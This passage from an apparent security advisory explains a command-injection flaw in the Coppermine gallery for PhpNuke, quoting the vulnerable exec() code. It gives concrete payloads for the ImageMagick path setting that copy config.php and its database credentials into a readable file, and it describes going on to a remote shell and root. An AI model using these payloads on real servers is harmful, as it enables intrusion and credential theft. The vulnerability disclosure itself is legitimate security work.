D. Execution of the arbitrary shell commands in server (needs nuke admin rights!):
Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin account.
Version scope: both new and old versions are affected.
So, how we can give any shell commands to server?
Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":
// Method for thumbnails creation
switch ($method) {
case "im" :
if (preg_match("#[A-Z]:|\\\\#Ai", __FILE__)) {
// get the basedir, remove '/include'
$cur_dir = "";
$src_file = '"' . strtr($src_file, '/', '\\') . '"';
$im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '\\') . '"'));
} else {
$src_file = escapeshellarg($src_file);
$im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
}
$output = array();
$cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";
//die("$cmd");
exec ($cmd, $output, $retval);
if ($retval) {
$ERROR = "Error executing ImageMagick - Return value: $retval";
if ($CONFIG['debug_mode']) {
As we can see, there is very dangerous php function "exec()" in use and some user input -
variables "$src_file" and "$dest_file" - are sanitized by "escapeshellarg()". All seems to be ok?
Yes... oops... what about config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ?
Coppermine's authors were assuming, that those variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate those configuration parameters and therefore
various shell commands can be injected to "exec()"!
You wanna details? Go to Coopermine's conficuration panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to value, which includes shell command, you want to execute in server.
Example "path" in case of windows server: "type config.php > config.txt &" ,
linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some pictures to server and go to "Batch add pictures".
And if all went right, then you will see "config.txt" file in phpnuke root directory, so anyone can
see in plaintext information with critical value - database name, username and password
Of course, skilled attacker can within 5 minutes get remote shell running in server through
arbitrary port (higher than 1024) and next hacking is not logged anymore, because webserver is bypassed.
One more step - finding and using local r00t exploit - and server is 0wned